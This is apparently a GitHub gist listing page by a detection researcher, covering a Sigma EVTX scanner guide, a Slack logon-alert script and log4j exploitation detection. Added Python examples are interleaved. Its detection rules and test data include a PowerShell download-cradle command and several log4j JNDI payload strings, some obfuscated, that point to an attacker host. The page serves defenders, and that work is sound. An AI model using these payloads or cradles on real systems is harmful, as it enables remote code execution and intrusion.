
Florian Roth Neo23x0

Neo23x0 / sigma-evtx-scan.md
Last active March 27, 2023 21:11
Guide to Use Sigma EVTX Checker

Guide to Use Nextron's Sigma EVTX Checker

It is a fast Go-based scanner for Linux, Windows and macOS that applies Sigma rules to Windows event logs (EVTX) and outputs the matches as JSON.

Clone the Sigma Repository and cd into it

git clone https://github.com/SigmaHQ/sigma.git
cd sigma
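To make concrete what "applying Sigma rules and emitting matches as JSON" means, here is an added example (not Nextron's scanner and not SigmaHQ code): a minimal evaluator for the Sigma detection subset most Windows process-creation rules use, run over constructed events in the flat field form an EVTX-to-JSON conversion produces. The rule, its placeholder id and the three events are constructed for this example; only `|contains`, `|endswith`, `|startswith`, `|re` and exact matches plus and/or/not conditions are supported (no `1 of selection*` or keyword lists), and string matching is case-insensitive as the Sigma specification requires.

```python
import json
import re

# Constructed rule in Sigma's YAML-as-dict shape; the id is a placeholder, not a SigmaHQ rule.
RULE = {
    "title": "Suspicious PowerShell Download Cradle",
    "id": "00000000-0000-4000-8000-000000000001",
    "level": "high",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": ["DownloadString", "Invoke-WebRequest", "iwr "],
        },
        "filter": {"ParentImage|endswith": "\\known_updater.exe"},
        "condition": "selection and not filter",
    },
}

# Constructed events (flattened EVTX fields); only the first should match.
EVENTS = [
    {"EventID": 1,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a')",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"EventID": 1,
     "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "CommandLine": "pwsh -c Invoke-WebRequest https://203.0.113.9/b",
     "ParentImage": "C:\\Program Files\\Vendor\\known_updater.exe"},   # excluded by the filter
    {"EventID": 1,
     "Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe C:\\Users\\bob\\DownloadString.txt",
     "ParentImage": "C:\\Windows\\explorer.exe"},
]


def _field_matches(event, key, wanted):
    """Evaluate one 'Field|modifier: value(s)' entry; a list of values is an OR."""
    field, _, mod = key.partition("|")
    value = str(event.get(field, ""))
    for w in (wanted if isinstance(wanted, list) else [wanted]):
        w = str(w)
        if mod == "re":
            if re.search(w, value):
                return True
            continue
        v, w = value.lower(), w.lower()          # Sigma string matching is case-insensitive
        if (mod == "contains" and w in v) or (mod == "endswith" and v.endswith(w)) \
                or (mod == "startswith" and v.startswith(w)) or (mod == "" and v == w):
            return True
    return False


def _search_matches(event, spec):
    """A mapping ANDs its fields; a list of mappings ORs them (Sigma semantics)."""
    if isinstance(spec, list):
        return any(_search_matches(event, s) for s in spec)
    return all(_field_matches(event, k, v) for k, v in spec.items())


def _eval_condition(cond, results):
    """Tiny recursive-descent evaluator for 'a and (b or not c)' style conditions."""
    toks = re.findall(r"\(|\)|\w+", cond)
    pos = 0

    def peek():
        return toks[pos] if pos < len(toks) else None

    def take():
        nonlocal pos
        pos += 1
        return toks[pos - 1]

    def expr():
        v = term()
        while peek() == "or":
            take()
            r = term()
            v = v or r
        return v

    def term():
        v = factor()
        while peek() == "and":
            take()
            r = factor()
            v = v and r
        return v

    def factor():
        t = take()
        if t == "not":
            return not factor()
        if t == "(":
            v = expr()
            take()                                 # consume ')'
            return v
        return results[t]                          # search identifier, e.g. 'selection'

    return expr()


def apply_rule(rule, event):
    det = rule["detection"]
    results = {name: _search_matches(event, spec) for name, spec in det.items() if name != "condition"}
    return _eval_condition(det["condition"], results)


def scan(rule, events):
    """One JSON-serialisable match record per hit, the shape a scanner would emit."""
    return [{"rule": rule["title"], "id": rule["id"], "level": rule["level"], "event": ev}
            for ev in events if apply_rule(rule, ev)]


if __name__ == "__main__":
    for match in scan(RULE, EVENTS):
        print(json.dumps(match))
```

Running it prints one JSON line for the cmd.exe-spawned PowerShell cradle; the pwsh.exe event is suppressed by the `filter` section, which is exactly the allow-listing pattern Sigma rules use to keep known-good parents out of the results.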
Neo23x0 / nighthawk-blog-posts.md
Last active December 2, 2022 10:37
Collection of Deleted Articles on MDSec's Nighthawk
Neo23x0 / send-to-slack.sh
Created September 11, 2022 21:22
Slack Hook - System Logon
#!/bin/bash
# Posts a Slack message on SSH logon (run it from a login hook such as /etc/ssh/sshrc or /etc/profile.d).
# No "-x" here: shell tracing would echo the secret webhook URL into the session/log output.
hostname=$(hostname)
source=$(echo "$SSH_CONNECTION" | cut -d' ' -f 1)   # client IP; SSH_CONNECTION is "client_ip client_port server_ip server_port"
geo=$(geoiplookup "$source" 2>/dev/null)            # needs the geoip-bin package; empty when unavailable
curl -X POST --silent --data "payload={\"text\": \":bust_in_silhouette: SYSTEM: $hostname USER: $USER SOURCE: $source GEO: $geo\"}" "https://hooks.slack.com/services/XXXXXXXX_YOURHOOK_XXXXX" > /dev/null
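The script above splices `$USER`, the client IP and the `geoiplookup` output straight into a hand-written JSON string, so a double quote in any of those fields breaks the payload or lets an attacker shape the message. The following is an added example, not the gist's script, that does the same notification with the body serialised by `json.dumps`, parses `SSH_CONNECTION` explicitly, and reads the webhook URL from an environment variable named `SLACK_HOOK_URL` (an assumed name) instead of hard-coding it. Slack incoming webhooks accept a JSON body with `Content-Type: application/json` as well as the `payload=` form field used above.

```python
import json
import os
import socket
import subprocess
import urllib.request

# Added example, not the gist's script. SLACK_HOOK_URL is an assumed environment variable name.


def ssh_client_ip(conn=None):
    """First field of sshd's SSH_CONNECTION ('client_ip client_port server_ip server_port')."""
    if conn is None:
        conn = os.environ.get("SSH_CONNECTION", "")
    fields = conn.split()
    return fields[0] if fields else "local"       # non-SSH logons have no SSH_CONNECTION


def geo_lookup(ip):
    """Best-effort geoiplookup (geoip-bin); 'n/a' when the tool is missing, slow or silent."""
    try:
        out = subprocess.run(["geoiplookup", ip], capture_output=True, text=True, timeout=5)
        return out.stdout.strip() or "n/a"
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return "n/a"


def build_payload(host, user, source, geo):
    """Message as a dict; json.dumps handles quoting of every untrusted field."""
    text = f":bust_in_silhouette: SYSTEM: {host} USER: {user} SOURCE: {source} GEO: {geo}"
    return {"text": text}


def encode_payload(payload):
    """Bytes actually sent on the wire; the same encoding notify() uses."""
    return json.dumps(payload).encode("utf-8")


def notify(hook_url, payload):
    req = urllib.request.Request(hook_url, data=encode_payload(payload),
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.status


if __name__ == "__main__":
    src = ssh_client_ip()
    msg = build_payload(socket.gethostname(), os.environ.get("USER", "?"), src, geo_lookup(src))
    hook = os.environ.get("SLACK_HOOK_URL")
    if hook:
        notify(hook, msg)
    else:
        print(json.dumps(msg))                    # dry run when no webhook is configured
```

Without `SLACK_HOOK_URL` set the script only prints the payload, which makes it safe to test from an interactive shell before wiring it into a login hook.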
Neo23x0 / cyber-security-blogs.txt
Created September 10, 2022 13:49
Cyber Security Blogs
https://thedfirreport.com/
https://www.zerodayinitiative.com/blog/
https://codewhitesec.blogspot.com/
https://www.digitalshadows.com/blog-and-research/
https://blog.talosintelligence.com/
https://www.riskiq.com/blog/
https://www.sekoia.io/en/blog-sekoia-io/
https://www.nextron-systems.com/blog/
https://www.microsoft.com/security/blog/
https://blog.truesec.com/
Neo23x0 / nvidia_cert_leak_vt_dorks.md
Created March 5, 2022 12:49
Samples Signed with NVIDIA Certs
Neo23x0 / log4j_rce_detection.md
Last active March 16, 2023 17:10
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against the log4j RCE vulnerability CVE-2021-44228.

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in the folder /var/log and all subfolders (-I skips binary files; for rotated, gzip-compressed logs run zgrep with the same pattern).

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
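The grep above only finds the literal `${jndi:` form (and the half-encoded `$%7Bjndi:` variant). As an added example, not part of the gist, the following Python applies the same scheme-list pattern to constructed web-server log lines, but first normalises each line by URL-decoding it and resolving the `${lower:x}`, `${upper:x}` and `${...:-x}` lookup nesting that attackers used to evade plain string matching. The log lines are constructed for the example and use documentation IP addresses.

```python
import re
import urllib.parse

# Constructed sample lines (not from the gist): plain, URL-encoded and lookup-obfuscated attempts,
# followed by a benign request that mentions "DownloadString"-like text for contrast.
SAMPLE_LOG = """\
10.0.0.1 - - [10/Dec/2021:12:00:00 +0000] "GET /?x=${jndi:ldap://203.0.113.5:1389/a} HTTP/1.1" 200 12
10.0.0.2 - - [10/Dec/2021:12:00:01 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%3A1389%2Fa%7D HTTP/1.1" 200 12
10.0.0.3 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 12 "-" "${${lower:j}ndi:rmi://203.0.113.5:1099/b}"
10.0.0.4 - - [10/Dec/2021:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 12
"""

# Same scheme list as the grep command; '{' or its percent-encoding after '$'.
JNDI_RE = re.compile(r"\$(\{|%7B)jndi:(ldaps?|rmi|dns|nis|iiop|corba|nds|http):/", re.IGNORECASE)

# ${lower:x} / ${upper:x} resolve to x; any ${name:-x} default-value lookup resolves to x.
LOOKUP_RE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}|\$\{[^{}]*:-([^{}]*)\}", re.IGNORECASE)


def normalize(line, max_rounds=5):
    """URL-decode and collapse innermost lookups repeatedly; capped so crafted input cannot loop forever."""
    s = line
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(s)
        decoded = LOOKUP_RE.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), decoded)
        if decoded == s:
            break
        s = decoded
    return s


def is_jndi_attempt(line):
    """True if the raw or normalised line carries a JNDI lookup for one of the listed schemes."""
    return JNDI_RE.search(line) is not None or JNDI_RE.search(normalize(line)) is not None


def scan(text):
    """(line_number, line) for every hit, in file order."""
    return [(n, line) for n, line in enumerate(text.splitlines(), 1) if is_jndi_attempt(line)]


if __name__ == "__main__":
    for n, line in scan(SAMPLE_LOG):
        print(f"{n}: {normalize(line)}")
```

Lines 1 to 3 are reported and line 4 is not; the grep command alone would miss lines 2 and 3. The decode loop is bounded because an attacker controls how deeply the lookups are nested.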
Neo23x0 / minecraft-seus-shader.md
Last active December 11, 2021 11:15
Minecraft with SEUS Shader - Guide
Neo23x0 / help.md
Last active January 31, 2023 21:57
Offensive Research Guide to Help Defense Improve Detection

I've transformed this gist into a git repository.


Whenever you research a certain vulnerability, ask yourself these questions and please answer them for us:

Logging

Does the exploited service write a log?
(check ls -lrt /var/log or lsof +D /var/log/ or lsof | grep servicename)

Neo23x0 / snippet_gen_yara_hash.py
Created October 10, 2020 15:51
YARA Rule Hash Used by Nextron Systems
import hashlib
import re


def calculate_rule_hash(rule):
    """
    Calculates a hash over the relevant YARA rule content (string contents, sorted condition)
    Requires a YARA rule object as generated by 'plyara': https://github.com/plyara/plyara
    :param rule: yara rule object
    :return hash: generated hash
    """